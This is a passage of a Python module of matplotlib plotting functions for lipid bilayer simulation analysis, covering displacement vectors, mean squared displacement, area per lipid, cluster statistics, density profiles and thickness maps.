tails[i].append((xk, yk))
return tails
##incomplete
def gen_step_vector_smooth_ghost_tails_forwards(vectors_resnames, length_back=9, length_forward=9, window=3, periodic_cut=75.0):
n_traj = len(vectors_resnames)
n_vecs = len(vectors_resnames[0][0])
smooth_delta = (window -1)/2
tails = []
# first do tails back
for i in range(n_traj):
back_index = i - length_back
while back_index < 0:
back_index += 1
tails.append([])
for j in range(n_vecs):
x = []
y = []
for k in range(back_index, i+1):
vec_c = vectors_resnames[k][0][j]
x.append(vec_c[0])
y.append(vec_c[1])
xx = []
yy = []
n_p = len(x)
for l in range(0, n_p-1):
cx = x[l]
nx = x[l+1]
cy = y[l]
ny = y[l+1]
dx = np.abs(nx - cx)
dy = np.abs(ny - cy)
#dist = np.sqrt(dx**2 + dy**2)
#print(dx, dy)
if dx < periodic_cut and dy < periodic_cut:
xx.append(cx)
yy.append(cy)
else:
xx = []
yy = []
xx.append(x[n_p-1])
yy.append(y[n_p-1])
n_pp = len(xx)
xxx = []
yyy = []
for k in range(n_pp):
b_i = k - smooth_delta
if b_i < 0:
b_i = 0
f_i = k + smooth_delta
if f_i >= n_pp:
f_i = n_pp-1
#print "k ",k," b_i ",b_i," f_i ",f_i," n_pp ",n_pp
x_s = 0.0
y_s = 0.0
a_s = 0
for l in range(b_i, f_i+1):
#print "k ",k," l ",l
x_s += xx[l]
y_s += yy[l]
a_s += 1
x_s /= a_s
y_s /= a_s
if a_s == window:
xxx.append(x_s)
yyy.append(y_s)
xxx.append(x[n_p-1])
yyy.append(y[n_p-1])
#print(xx)
xk = np.array(xxx)
yk = np.array(yyy)
tails[i].append((xk, yk))
return tails
def plot_step_vectors(vectors_resnames, filename='step_vectors.pdf',save=True,
show=False, scaled=False, wrapped=False,
ghost_tails=None, ghost_tail_alpha=0.5, ghost_tail_arrow=False, ylim=None, xlim=None):
'''
Generates a single plot with the lipid displacement vectors (or step vectors)
Takes a single frame of the output from:
MemSys.StepVector
Corresponding colors (if multiple lipid types are included) can be
generated using:
MemSys.StepVectorColors
'''
color_list = _color_list
_colors = itertools.cycle(('#47d147', '#2929a3', '#e6b800', '#e65c00', '#cc33ff', '#33ccff', '#009999', '#996633', '#666699'))
sns.set_style("whitegrid")
x = vectors_resnames[0][:,0]
y=vectors_resnames[0][:,1]
vx = vectors_resnames[0][:,2]
vy = vectors_resnames[0][:,3]
with plt.rc_context({'figure.figsize': [8.00, 7.25], 'font.size': 16, 'axes.labelsize': 22,
'legend.fontsize': 20,
'xtick.labelsize': 16,
'ytick.labelsize': 16}):
plt.figure()
# plt.style.use('figure.figsize': [14.75, 7.25])
resnames = sorted(set(vectors_resnames[1]))
resnames = ['POPC', 'DOPE', 'TLCL2']
# i = 0
color_dict = {}
color_names = {'POPC':'green', 'DOPE':'blue', 'TLCL2':'gold'}
for res in resnames:
color_dict[res] = next(_colors)
# color_dict['POPC'] = '#1e8449'
colors = []
for residue in vectors_resnames[1]:
colors.append(color_dict[residue])
#print(x)
# Q = plt.quiver(x,y,vx,vy,color=colors)
#vector = np.array([vx[0], vy[1]])
#print("vector 0 length is: {}".format(np.sqrt(np.dot(vector,vector))))
# plot tails first
if ghost_tails is not None:
res = 0
for ghost_tail in ghost_tails:
#print(ghost_tail)
resn = vectors_resnames[1][res]
color = color_dict[resn]
#print(color)
if ghost_tail_arrow:
npoint = len(ghost_tail[0])
# if npoint > 1:
# print(npoint)
# print(range(1, npoint, 1))
# quit()
for iii in range(1, npoint, 1):
x2 = ghost_tail[0][iii]
y2 = ghost_tail[1][iii]
x1 = ghost_tail[0][iii-1]
y1 = ghost_tail[1][iii-1]
#print(iii, x1, y1, x2, y2, npoint)
plt.arrow(x1, y1, x2-x1, y2-y1, width=0.375, length_includes_head=True, alpha=ghost_tail_alpha, linewidth=1.0, color=color, zorder=1)
#break
# if npoint > 1:
# print(npoint)
# print(range(1, npoint, 1))
# quit()
else:
plt.plot(ghost_tail[0], ghost_tail[1], color=color,
alpha=ghost_tail_alpha, linewidth = 1.5)
res += 1
#Now plot the disp vecs
Q = plt.quiver(x, y, vx, vy, color=colors, angles='xy', scale_units='xy', scale=1, zorder=2)
label_string = ""
for resname in resnames:
label_string+=resname+":"+color_names[resname]+" "
#dummy_qk = plt.quiverkey(Q, 0.20, 0.975, 2, label_string, labelpos='E',
# coordinates='figure')
#else:
# plt.quiver(x,y,vx,vy)
#plt.title('Lateral Displacement Vectors')
if scaled:
plt.xlabel("x (scaled coordinates)")
plt.ylabel("y (scaled coordinates)")
else:
plt.xlabel("x ($\AA$)")
plt.ylabel("y ($\AA$)")
if ylim is not None:
plt.ylim(ylim)
if xlim is not None:
plt.xlim(xlim)
if scaled and wrapped:
plt.xlim((-0.1, 1.1))
plt.ylim((-0.1, 1.1))
elif scaled and not wrapped:
plt.xlim(-0.2, 1.2)
plt.ylim(-0.1, 1.2)
plt.tight_layout()
if save:
#plt.savefig(filename, transparent=True, bbox_inches='tight')
plt.savefig(filename, transparent=True)
#plt.savefig(filename, bbox_inches='tight')
if show:
return plt.show()
plt.close()
return
def plot_step_vectors_comtraj(vectors, colors=None, filename='step_vectors.pdf',show=False, save=True):
'''
Generates a single plot with the lipid displacement vectors (or step vectors)
Takes a single frame of the output from:
MemSys.StepVector
Corresponding colors (if multiple lipid types are included) can be
generated using:
MemSys.StepVectorColors
'''
sns.set_style("whitegrid")
x = vectors[:,0]
y=vectors[:,1]
vx = vectors[:,2]
vy = vectors[:,3]
dummy_step_vec_plot = plt.figure()
if colors is not None:
plt.quiver(x,y,vx,vy,color=colors)
else:
plt.quiver(x,y,vx,vy)
#plt.title('Lateral Displacement Vectors')
plt.tight_layout()
if save:
plt.savefig(filename)
if show:
return plt.show()
plt.close()
return
def plot_step_vectors_stroboscopic(vectors_resnames, index=0,
filename='step_vectors_stroboscopic.pdf',
save=True, show=False, scaled=False,
wrapped=False):
'''
Generates a stroboscopic trajectory plot with the displacement vectors
(or step vectors) of a single lipid.
Takes the output from the 'disp_vec' analysis of the bilayer_analyzer:
'''
sns.set_style("whitegrid")
plt.figure()
x = []
y = []
for dv_res in vectors_resnames:
dv = dv_res[0]
x.append(dv[index][0])
y.append(dv[index][1])
#print(x)
#print(y)
Q = plt.plot(x, y)
# label_string = ""
#else:
# plt.quiver(x,y,vx,vy)
#plt.title('Lateral Displacement Vectors')
if scaled:
plt.xlabel("x (scaled coordinates)")
plt.ylabel("y (scaled coordinates)")
else:
plt.xlabel("x ($\AA$)")
plt.ylabel("y ($\AA$)")
if scaled and wrapped:
plt.xlim((-0.1, 1.1))
plt.ylim((-0.1, 1.1))
elif scaled and not wrapped:
plt.xlim(-0.2, 1.2)
plt.ylim(-0.1, 1.2)
plt.tight_layout()
if save:
plt.savefig(filename)
if show:
return plt.show()
plt.close()
return
def plot_msd(msd_dat_list,name_list=None,filename='msd.pdf',time_in='ps',time_out='ns',show=False, interval=1,save=True):
'''
Generates a single plot with Mean Squared Displacement curves
Takes outputs from:
MemSys.CalcMSD
MemSys.CalcMSD_parallel
The outputs are passed to function in a list input: apl_dat_list
'''
# params = {
# 'axes.labelsize': 20,
# 'text.fontsize': 20,
# 'legend.fontsize': 20,
# 'xtick.labelsize': 16,
# 'ytick.labelsize': 16,
# 'text.usetex': False,
# 'figure.figsize': [8.0, 6.0]
# }
# params = {'figure.figsize': [10.0, 8.0]}
# mpl.rcParams.update(params)
#
i = 0
for msd_dat in msd_dat_list:
msd_d = msd_dat.copy()
t = msd_d[::interval,0]
if time_in == 'ps' and time_out == 'ns':
t/=1000.0
elif time_in == 'ns' and time_out == 'ps':
t*=1000.0
msd = msd_d[::interval,1]
if name_list is not None:
plt.plot(t, msd, linewidth=4.0,label=name_list[i])
else:
plt.plot(t, msd, linewidth=4.0)
i+=1
#plt.title("Mean Sqared Displacement vs. Time")
xlabel = "Time ("+time_out+")"
plt.xlabel(xlabel)
plt.ylabel("Distance in the lateral plane ($\AA^2$)")
if name_list is not None:
plt.legend(loc=0)
plt.tight_layout()
if save:
plt.savefig(filename)
if show:
return plt.show()
plt.close()
return
def plot_area_per_lipid(apl_dat_list,name_list=None,filename='apl.pdf',time_in='ps',time_out='ns',save=True,show=False, interval=1, ylim=None, xlim=None):
'''
Generates a single plot with area per lipid (apl) curves
Takes outputs from:
MemSys.CalcAreaPerLipid_Box
MemSys.CalcAreaPerLipid_ClosestNeighborCircle
The outputs are passed to function in a list input: apl_dat_list
'''
#print "filename: ", filename
i = 0
for apl_dat in apl_dat_list:
apl_d = apl_dat.copy()
t = apl_d[::interval,0]
n_points = len(t)
if time_in == 'ps' and time_out == 'ns':
#print "switching time units from ps to ns"
t/=1000.0
elif time_in == 'ns' and time_out == 'ps':
t*=1000.0
apl = apl_d[::interval,2]
apl_dev = apl_d[::interval,3]
if name_list is not None:
#print "plotting",name_list[i]," with errorbars"
#print t
#print apl
#plt.errorbar(t, apl, yerr=apl_dev, label=name_list[i])
if n_points <= 30:
plt.errorbar(t, apl, yerr=apl_dev, label=name_list[i])
else:
p = plt.plot(t, apl, label=name_list[i])
c = p[0].get_color()
plt.fill_between(t, apl-apl_dev, apl+apl_dev, alpha=0.25, interpolate=True, color=c)
else:
if n_points <= 30:
plt.errorbar(t, apl, yerr=apl_dev)
else:
p = plt.plot(t, apl)
c = p[0].get_color()
plt.fill_between(t, apl - apl_dev, apl + apl_dev, alpha=0.25, interpolate=True, color=c)
i+=1
#plt.title("Mean Sqared Displacement vs. Time")
xlabel = "Time ("+time_out+")"
plt.xlabel(xlabel)
plt.ylabel("Area per lipid ($\AA^2$)")
if xlim is not None:
plt.xlim(xlim)
if ylim is not None:
plt.ylim(ylim)
if name_list is not None:
plt.legend(loc=0)
plt.tight_layout()
if save:
plt.savefig(filename)
if show:
return plt.show()
plt.close()
return
def plot_dc_cluster_dat_number(clust_dat_list,name_list=None,filename='clust_number.pdf',time_in='ps',time_out='ns',
save=True, show=False):
"""Generates a plot of the average number of clusters (vs. time)
This function generates a plot of the average number of clusters vs. time for data output with key 'nclusters'
from the 'dc_cluster' analysis in the BilayerAnalyzer, which corresponds to the
bilayer_analyzer.analysis_protocols.DCClusterProtocol analysis protocol class.
Args:
clust_dat_list (list): This is a list of all data to plot and should be a list of tuples/lists where
each element tuple has the data arrays for each time series curve to include in the plot: e.g.
[ (times_1, means_1, stds_1), (times_2, means_2, stds_2) ]
name_list (list, optional): This is a list of string names to assign each curve included in the plot. It
should have len(name_list) == len(clust_dat_list) = True.
Default: None
filename (str, optional): This a string containing the filename for the output plot if save is set to True.
Default: 'clust_number.pdf'
time_in (str, optional): This is a string specifying the time units of values in the input arrays. Acceptible values
are 'ps' for picosecond and 'ns' nanosecond.
Default: 'ps'
time_out (str, optional): This is a string specifying the time units to use in the output plot. Acceptible values
are 'ps' for picosecond and 'ns' nanosecond. If this is different than the value for time_in then the time
values will be scaled accordingly.
Default: 'ns'
save (bool, optional): This is boolean switch to set whether or not to save the generated plot to disc.
plt.savefig is called.
Default: True
show (bool, optional): This is boolean switch to set whether or not the generated plot is displayed in interactive
mode using plt.show.
Default: False
"""
i = 0
for cl_dat in clust_dat_list:
t = cl_dat[0]
if time_in == 'ps' and time_out == 'ns':
#print "switching time units from ps to ns"
t/=1000.0
elif time_in == 'ns' and time_out == 'ps':
t*=1000.0
means = cl_dat[1]
stds = cl_dat[2]
if name_list is not None:
#print "plotting",name_list[i]," with errorbars"
#print t
#print apl
plt.errorbar(t, means, yerr=stds, label=name_list[i])
else:
plt.errorbar(t, means, yerr=stds)
i+=1
#plt.title("Mean Sqared Displacement vs. Time")
xlabel = "Time ("+time_out+")"
plt.xlabel(xlabel)
plt.ylabel("Average Number of Clusters")
if name_list is not None:
plt.legend(loc=0)
plt.tight_layout()
if save:
plt.savefig(filename)
if show:
return plt.show()
plt.close()
return
def plot_dc_cluster_dat_size(clust_dat_list,name_list=None,filename='clust_number.pdf',time_in='ps',time_out='ns',
save=True, show=False):
"""Generates a plot of the average cluster size (vs. time)
This function generates a plot of the average cluster size vs. time for data output with key 'avg_size' from the
'dc_cluster' analysis in the BilayerAnalyzer, which corresponds to the
bilayer_analyzer.analysis_protocols.DCClusterProtocol analysis protocol class.
Args:
clust_dat_list (list): This is a list of all data to plot and should be a list of tuples/lists where
each element tuple has the data arrays for each time series curve to include in the plot: e.g.
[ (times_1, means_1, stds_1), (times_2, means_2, stds_2) ]
name_list (list, optional): This is a list of string names to assign each curve included in the plot. It
should have len(name_list) == len(clust_dat_list) = True.
Default: None
filename (str, optional): This a string containing the filename for the output plot if save is set to True.
Default: 'clust_number.pdf'
time_in (str, optional): This is a string specifying the time units of values in the input arrays. Acceptible values
are 'ps' for picosecond and 'ns' nanosecond.
Default: 'ps'
time_out (str, optional): This is a string specifying the time units to use in the output plot. Acceptible values
are 'ps' for picosecond and 'ns' nanosecond. If this is different than the value for time_in then the time
values will be scaled accordingly.
Default: 'ns'
save (bool, optional): This is boolean switch to set whether or not to save the generated plot to disc.
plt.savefig is called.
Default: True
show (bool, optional): This is boolean switch to set whether or not the generated plot is displayed in interactive
mode using plt.show.
Default: False
"""
i = 0
for cl_dat in clust_dat_list:
t = cl_dat[0]
if time_in == 'ps' and time_out == 'ns':
#print "switching time units from ps to ns"
t/=1000.0
elif time_in == 'ns' and time_out == 'ps':
t*=1000.0
means = cl_dat[1]
stds = cl_dat[2]
if name_list is not None:
#print "plotting",name_list[i]," with errorbars"
#print t
#print apl
plt.errorbar(t, means, yerr=stds, label=name_list[i])
else:
plt.errorbar(t, means, yerr=stds)
i+=1
#plt.title("Mean Sqared Displacement vs. Time")
xlabel = "Time ("+time_out+")"
plt.xlabel(xlabel)
plt.ylabel("Average Size of Cluster")
if name_list is not None:
plt.legend(loc=0)
plt.tight_layout()
if save:
plt.savefig(filename)
if show:
return plt.show()
plt.close()
return
def plot_dc_cluster_dat_number_comtraj(clust_dat_list,name_list=None,filename='clust_number.pdf',time_in='ps',time_out='ns',show=False):
'''
Generates a single of the average number of clusters (vs. time)
using output data from:
MemSys.CheckClustering
The outputs are passed to function in a list input: clust_dat_list
'''
i = 0
for cl_dat in clust_dat_list:
cl_loc = cl_dat.copy()
t = cl_loc[:,0]
if time_in == 'ps' and time_out == 'ns':
#print "switching time units from ps to ns"
t/=1000.0
elif time_in == 'ns' and time_out == 'ps':
t*=1000.0
cl = cl_loc[:,5]
cl_dev = cl_loc[:,6]
if name_list is not None:
#print "plotting",name_list[i]," with errorbars"
#print t
#print apl
plt.errorbar(t, cl, yerr=cl_dev, label=name_list[i])
else:
plt.errorbar(t, cl, yerr=cl_dev)
i+=1
#plt.title("Mean Sqared Displacement vs. Time")
xlabel = "Time ("+time_out+")"
plt.xlabel(xlabel)
plt.ylabel("Average Number of Clusters")
if name_list is not None:
plt.legend(loc=0)
plt.tight_layout()
plt.savefig(filename)
if show:
return plt.show()
plt.close()
return
def plot_dc_cluster_dat_size_comtraj(clust_dat_list,name_list=None,filename='clust_size.pdf',time_in='ps',time_out='ns',show=False):
'''
Generates a single plot of the average cluster size (vs time)
using output data from:
MemSys.CheckClustering
The outputs are passed to function in a list input: clust_dat_list
'''
i = 0
for cl_dat in clust_dat_list:
cl_loc = cl_dat.copy()
t = cl_loc[:,0]
if time_in == 'ps' and time_out == 'ns':
#print "switching time units from ps to ns"
t/=1000.0
elif time_in == 'ns' and time_out == 'ps':
t*=1000.0
cl = cl_loc[:,7]
cl_dev = cl_loc[:,8]
if name_list is not None:
#print "plotting",name_list[i]," with errorbars"
#print t
#print apl
plt.errorbar(t, cl, yerr=cl_dev, label=name_list[i])
else:
plt.errorbar(t, cl, yerr=cl_dev)
i+=1
#plt.title("Mean Sqared Displacement vs. Time")
xlabel = "Time ("+time_out+")"
plt.xlabel(xlabel)
plt.ylabel("Average Size of Cluster (lipids per cluster)")
if name_list is not None:
plt.legend(loc=0)
plt.tight_layout()
plt.savefig(filename)
if show:
return plt.show()
plt.close()
return
def plot_dc_cluster_maps_comtraj(clusters, filename='cluster_map.pdf',show=False):
'''
Generates a single plot of the lipid cluster map
Takes a single frame of the output from:
MemSys.ExportClustersForPlotting
'''
sns.set_style("whitegrid")
x = clusters[0]
y=clusters[1]
c = clusters[2]
plt.scatter(x,y,c=c,s=800)
#plt.title('Lateral Displacement Vectors')
plt.tight_layout()
plt.savefig(filename)
if show:
return plt.show()
plt.close()
return
def plot_density_profile(dp_out_list, save=True, filename='density_profile.pdf', show=False, label_list=None, ylabel='Density'):
""" Plot density profiles
This function can be used to plot the results of density profiles functions
in the mda_density_profile module.
Args:
dp_out_list (list of tuples): A list of the tuple outputs of the profile calculation functions
save (bool, optional): Default is True. Saves the plot output as an image file if True.
filename (str, optional): The name out the image file that will be created if save=True.
show (bool, optional): Default is False. Display the plot (plt.show) if True.
label_list (list of str : None, optional): Default is None. Allows a list of strings used to
label the plot lines.
"""
i = 0
for item in dp_out_list:
if label_list is not None:
plt.plot(item[0], item[1], label=label_list[i])
else:
plt.plot(item[0], item[1])
i+=1
if label_list is not None:
plt.legend(loc=0)
plt.ylabel(ylabel)
plt.xlabel('Position Along the Normal')
#plt.xlabel(ylabel)
#plt.ylabel('Position Along the Normal')
plt.tight_layout()
if save:
plt.savefig(filename)
if show:
return plt.show()
plt.close()
return
def plot_grid_as_scatter(in_xyzc, save=True, filename='lipid_grid.pdf', show=False, colorbar=False, cmap=None, vmin=None, vmax=None):
cma = plt.cm.get_cmap('viridis')
if cmap is not None:
cma = cmap
if vmin is not None and vmax is None:
plt.scatter(in_xyzc[0], in_xyzc[1], c=in_xyzc[3], marker='s',s=50, cmap=cma, vmin=vmin)
elif vmax is not None and vmin is None:
plt.scatter(in_xyzc[0], in_xyzc[1], c=in_xyzc[3], marker='s',s=50, cmap=cma, vmax=vmax)
elif vmin is not None and vmax is not None:
plt.scatter(in_xyzc[0], in_xyzc[1], c=in_xyzc[3], marker='s', s=50, cmap=cma, vmin=vmin, vmax=vmax)
else:
plt.scatter(in_xyzc[0], in_xyzc[1], c=in_xyzc[3], marker='s',s=50, cmap=cma)
if colorbar:
plt.colorbar()
plt.tight_layout()
if save:
plt.savefig(filename)
if show:
return plt.show()
plt.close()
return
def plot_corr_mat(in_corrmat, save=True, filename='correlation_matrix.pdf', show=False ):
cma = plt.cm.get_cmap('inferno')
plt.imshow(in_corrmat, cmap=cma, interpolation='none', vmin=-1.0, vmax=1.0)
plt.colorbar()
plt.tight_layout()
if save:
plt.savefig(filename)
if show:
return plt.show()
plt.close()
return
def plot_corr_mat_as_scatter(in_corrmat, save=True, filename='correlation_matrix.pdf', show=False ):
ax_l = len(in_corrmat)
x_axes = np.zeros(ax_l ** 2, dtype=np.int)
y_axes = np.zeros(ax_l ** 2, dtype=np.int)
c = np.zeros(ax_l ** 2)
k = 0
for i in range(ax_l):
for j in range(ax_l):
x_axes[k] = i
y_axes[k] = j
c[k] = in_corrmat[i, j]
k += 1
cma = plt.cm.get_cmap('viridis')
plt.scatter(x_axes, y_axes, c=c, marker='s', s=10, edgecolors='none', cmap=cma, vmin=-1.0, vmax=1.0)
plt.colorbar()
plt.tight_layout()
if save:
plt.savefig(filename)
if show:
return plt.show()
plt.close()
return
def plot_average_deuterium_op(dop_dat_list,name_list=None,filename='dop.pdf',time_in='ps',time_out='ns',show=False, interval=1):
'''
Generates a single plot of the average deuterium order parameter vs. time
The outputs are passed to function in a list input: dop_dat_list
'''
#print "filename: ", filename
i = 0
for dop_dat in dop_dat_list:
dop_d = dop_dat.copy()
t = dop_d[::interval,0]
if time_in == 'ps' and time_out == 'ns':
#print "switching time units from ps to ns"
t/=1000.0
elif time_in == 'ns' and time_out == 'ps':
t*=1000.0
dop = dop_d[::interval,4]
dop_dev = dop_d[::interval,5]
if name_list is not None:
#print "plotting",name_list[i]," with errorbars"
#print t
#print dop
plt.errorbar(t, dop, yerr=dop_dev,label=name_list[i])
else:
plt.errorbar(t, dop, yerr=dop_dev)
i+=1
#plt.title("Mean Sqared Displacement vs. Time")
xlabel = "Time ("+time_out+")"
plt.xlabel(xlabel)
plt.ylabel("Average Deuterium Order Parameter")
if name_list is not None:
plt.legend(loc=0)
plt.tight_layout()
plt.savefig(filename)
if show:
return plt.show()
plt.close()
return
def plot_bilayer_thickness(bt_dat_list,name_list=None,
filename='bilayer_thickness.pdf',
time_in='ps',time_out='ns',show=False,
interval=1, save=True, xlim = None, ylim=None):
'''
Generates a single plot with bilayer thickness curves
Takes outputs from:
The outputs are passed to function in a list input: bt_dat_list
'''
i = 0
for bt_dat in bt_dat_list:
bt_d = bt_dat.copy()
t = bt_d[::interval,0]
if time_in == 'ps' and time_out == 'ns':
t/=1000.0
elif time_in == 'ns' and time_out == 'ps':
t*=1000.0
bt = bt_d[::interval,2]
error = bt_d[::interval,3]
if name_list is not None:
plt.errorbar(t, bt, yerr=error, label=name_list[i])
else:
plt.errorbar(t, bt, yerr=error)
i+=1
#plt.title("Mean Sqared Displacement vs. Time")
xlabel = "Time ("+time_out+")"
plt.xlabel(xlabel)
plt.ylabel("Bilayer thickness ($\AA$)")
if xlim is not None:
plt.xlim(xlim)
if ylim is not None:
plt.ylim(ylim)
if name_list is not None:
plt.legend(loc=0)
plt.tight_layout()
if save:
plt.savefig(filename)
if show:
return plt.show()
plt.close()
return
def plot_displacement_lipid_type_cross_correlation(analyzer_data, filename='normal_displacement_lipid_type_cross_correlation.pdf',show=False, save=True):
color_list = _color_list
#build the data objects
leaflets = sorted(list(analyzer_data.keys()), reverse=True)
count = 0
lipid_types = []
yvals = []
yerr = []
for leaflet in leaflets:
for lipid_resname in sorted(analyzer_data[leaflet].keys()):
if leaflet == 'upper':
count+=1
mean = analyzer_data[leaflet][lipid_resname][-1][2]
deviation = analyzer_data[leaflet][lipid_resname][-1][3]
lipid_types.append(lipid_resname)
yvals.append(mean)
yerr.append(deviation)
unique_lipid_types = set(lipid_types)
color_dict = {}
i =0
for l_type in sorted(unique_lipid_types):
color_dict[l_type] = color_list[i]
i+=1
if i == len(unique_lipid_types):
i = 0
colors = []
for l_type in lipid_types:
colors.append(color_dict[l_type])
xval = np.arange(len(yvals))
val_by_lipid = {}
for i in range(len(xval)):
lipid = lipid_types[i]
xv = xval[i]
yv = yvals[i]
ye = yerr[i]
color = colors[i]
if lipid in list(val_by_lipid.keys()):
val_by_lipid[lipid][0].append(xv)
val_by_lipid[lipid][1].append(yv)
val_by_lipid[lipid][2].append(ye)
val_by_lipid[lipid][3].append(color)
val_by_lipid[lipid][4].append(lipid)
else:
val_by_lipid[lipid] = [[xv], [yv], [ye], [color], [lipid]]
width = 0.35
for lipid_resname in sorted(unique_lipid_types):
#print(val_by_lipid[lipid_resname][0])
plt.bar(val_by_lipid[lipid_resname][0], val_by_lipid[lipid_resname][1], width,
yerr=val_by_lipid[lipid_resname][2], color=val_by_lipid[lipid_resname][3][0],
label=lipid_resname,
error_kw=dict(ecolor=val_by_lipid[lipid_resname][3][0], lw=2, capsize=5, capthick=2))
line_xval = [xval[count-1]+0.5+(width/2.0), xval[count-1]+0.5+(width/2.0)]
line_yval = [min(yvals)-max(yerr), max(yvals)+1.25*max(yerr)]
plt.plot(line_xval, line_yval, color='black')
plt.plot([0, max(xval)+1], [0.0, 0.0], 'k--')
plt.text(xval[0]+0.25, max(yvals)+1.25*max(yerr), 'upper leaflet')
plt.text(xval[count], max(yvals) + 1.25 * max(yerr), 'lower leaflet')
plt.legend(loc=0)
plt.xlabel('Lipid type')
plt.ylabel('Cross correlation')
plt.tick_params(labelbottom=False)
plt.tight_layout()
if save:
plt.savefig(filename)
if show:
return plt.show()
plt.close()
return
def plot_position_density_map_2d_scatter(x_centers, y_centers, counts,
save=True,
filename='position_density_2d.pdf',
show=False, colorbar=True,
vmin=0.0, vmax=None,
normalized=False,
scaled_to_max=False):
cma = plt.cm.get_cmap('jet')
x_pos = []
y_pos = []
color_vals = []
for i in range(len(x_centers)):
for j in range(len(y_centers)):
x_pos.append(x_centers[i])
y_pos.append(y_centers[j])
color_vals.append(counts[i][j])
x_pos = np.array(x_pos)
y_pos = np.array(y_pos)
color_vals = np.array(color_vals)
if normalized:
vmax = 1.0
vmin = 0.0
if vmin is not None and vmax is None:
plt.scatter(x_pos, y_pos, c=color_vals, marker='s',s=50, cmap=cma, vmin=vmin, edgecolors='face')
elif vmax is not None and vmin is None:
plt.scatter(x_pos, y_pos, c=color_vals, marker='s',s=50, cmap=cma, vmax=vmax, edgecolors='face')
elif vmin is not None and vmax is not None:
plt.scatter(x_pos, y_pos, c=color_vals, marker='s', s=50, cmap=cma, vmin=vmin, vmax=vmax, edgecolors='face')
else:
plt.scatter(x_pos, y_pos, c=color_vals, marker='s',s=50, cmap=cma, edgecolors='face')
plt.xlabel('x ($\AA$)')
plt.ylabel('y ($\AA$)')
#print in_xyzc[3]
#plt.scatter(in_xyzc[0], in_xyzc[1], c=in_xyzc[3], marker='s',s=50, cmap=cma)
#cax, kw = mpl.colorbar.make_axes(plt.gca())
#norm = mpl.colors.Normalize(vmin = min(in_xyzc[3]), vmax = max(in_xyzc[3]), clip = False)
#c = mpl.colorbar.ColorbarBase(cax, cmap=cma, norm=norm)
if colorbar:
cbar = plt.colorbar()
if normalized:
cbar.ax.set_ylabel('Count (normalized)')
elif scaled_to_max:
cbar.ax.set_ylabel('Count (scaled to maximum)')
else:
cbar.ax.set_ylabel('Count')
plt.tight_layout()
if save:
plt.savefig(filename)
if show:
return plt.show()
plt.close()
return
def plot_position_density_map_2d(x_centers, y_centers, counts, save=True, filename='position_density_2d.pdf',
show=False, colorbar=True, vmin=0.0, vmax=None, normalized=False,
scaled_to_max=False, interpolation='none'):
#cma = plt.cm.get_cmap('YlGnBu_r')
cma = plt.cm.get_cmap('jet')
nbins = len(x_centers)
#need to rearrange the array order for imshow to match the same x and y values as is assumed with input counts
counts_swapped = np.zeros((nbins,nbins), dtype=counts.dtype)
for i in range(nbins):
ii = nbins-i - 1
for j in range(nbins):
counts_swapped[i,j] = counts[j,ii]
if normalized:
vmax = 1.0
vmin = 0.0
if vmin is not None and vmax is None:
plt.imshow(counts_swapped, cmap=cma, interpolation=interpolation,
extent=[np.min(x_centers), np.max(x_centers), np.min(y_centers), np.max(y_centers)], vmin=vmin)
elif vmax is not None and vmin is None:
plt.imshow(counts_swapped, cmap=cma, interpolation=interpolation,
extent=[np.min(x_centers), np.max(x_centers), np.min(y_centers), np.max(y_centers)], vmax=vmax)
elif vmin is not None and vmax is not None:
plt.imshow(counts_swapped, cmap=cma, interpolation=interpolation,
extent=[np.min(x_centers), np.max(x_centers), np.min(y_centers), np.max(y_centers)],
vmin=vmin, vmax=vmax)
else:
plt.imshow(counts_swapped, cmap=cma, interpolation=interpolation,
extent=[np.min(x_centers), np.max(x_centers), np.min(y_centers), np.max(y_centers)])
plt.xlabel('x ($\AA$)')
plt.ylabel('y ($\AA$)')
#print in_xyzc[3]
#plt.scatter(in_xyzc[0], in_xyzc[1], c=in_xyzc[3], marker='s',s=50, cmap=cma)
#cax, kw = mpl.colorbar.make_axes(plt.gca())
#norm = mpl.colors.Normalize(vmin = min(in_xyzc[3]), vmax = max(in_xyzc[3]), clip = False)
#c = mpl.colorbar.ColorbarBase(cax, cmap=cma, norm=norm)
if colorbar:
cbar = plt.colorbar()
if normalized:
cbar.ax.set_ylabel('Count (normalized)')
elif scaled_to_max:
cbar.ax.set_ylabel('Count (scaled to maximum)')
else:
cbar.ax.set_ylabel('Count')
plt.tight_layout()
if save:
plt.savefig(filename)
if show:
return plt.show()
plt.close()
return
def plot_lipid_grid_thickness_map_2d(x_centers, y_centers, thickness_grid, save=True, filename='bilayer_thickness_map_2d.pdf',
show=False, colorbar=True, vmin=0.0, vmax=None, interpolation='none'):
#cma = plt.cm.get_cmap('YlGnBu_r')
cma = plt.cm.get_cmap('viridis')
nx = thickness_grid.shape[0]
ny = thickness_grid.shape[1]
#need to rearrange the array order for imshow to match the same x and y values as is assumed with input thickness_grid
thickness_swapped = np.zeros((ny,nx), dtype=thickness_grid.dtype)
for i in range(ny):
if i < nx:
ii = ny-i - 1
for j in range(nx):
if j < nx:
thickness_swapped[i,j] = thickness_grid[j,ii]
for i in range(nx):
if i < ny:
ii = nx - i - 1
for j in range(ny):
if j < ny:
thickness_swapped[i, j] = thickness_grid[j, ii]
if vmin is not None and vmax is None:
plt.imshow(thickness_swapped, cmap=cma, interpolation=interpolation,
extent=[np.min(x_centers), np.max(x_centers), np.min(y_centers), np.max(y_centers)], vmin=vmin)
elif vmax is not None and vmin is None:
plt.imshow(thickness_swapped, cmap=cma, interpolation=interpolation,
extent=[np.min(x_centers), np.max(x_centers), np.min(y_centers), np.max(y_centers)], vmax=vmax)
elif vmin is not None and vmax is not None:
plt.imshow(thickness_swapped, cmap=cma, interpolation=interpolation,
extent=[np.min(x_centers), np.max(x_centers), np.min(y_centers), np.max(y_centers)],
vmin=vmin, vmax=vmax)
else:
plt.imshow(thickness_swapped, cmap=cma, interpolation=interpolation,
extent=[np.min(x_centers), np.max(x_centers), np.min(y_centers), np.max(y_centers)])
plt.xlabel('x ($\AA$)')
plt.ylabel('y ($\AA$)')
#print in_xyzc[3]
#plt.scatter(in_xyzc[0], in_xyzc[1], c=in_xyzc[3], marker='s',s=50, cmap=cma)
#cax, kw = mpl.colorbar.make_axes(plt.gca())
#norm = mpl.colors.Normalize(vmin = min(in_xyzc[3]), vmax = max(in_xyzc[3]), clip = False)
#c = mpl.colorbar.ColorbarBase(cax, cmap=cma, norm=norm)
if colorbar:
cbar = plt.colorbar()
cbar.ax.set_ylabel('Thickness ($\AA$)')
plt.tight_layout()
if save:
plt.savefig(filename)
if show:
return plt.show()
plt.close()
return
def plot_xygrid_as_imshow(x_centers, y_centers, grid, filename='grid.pdf',
save=True, show=False, colorbar=False, colorbarlabel=None,
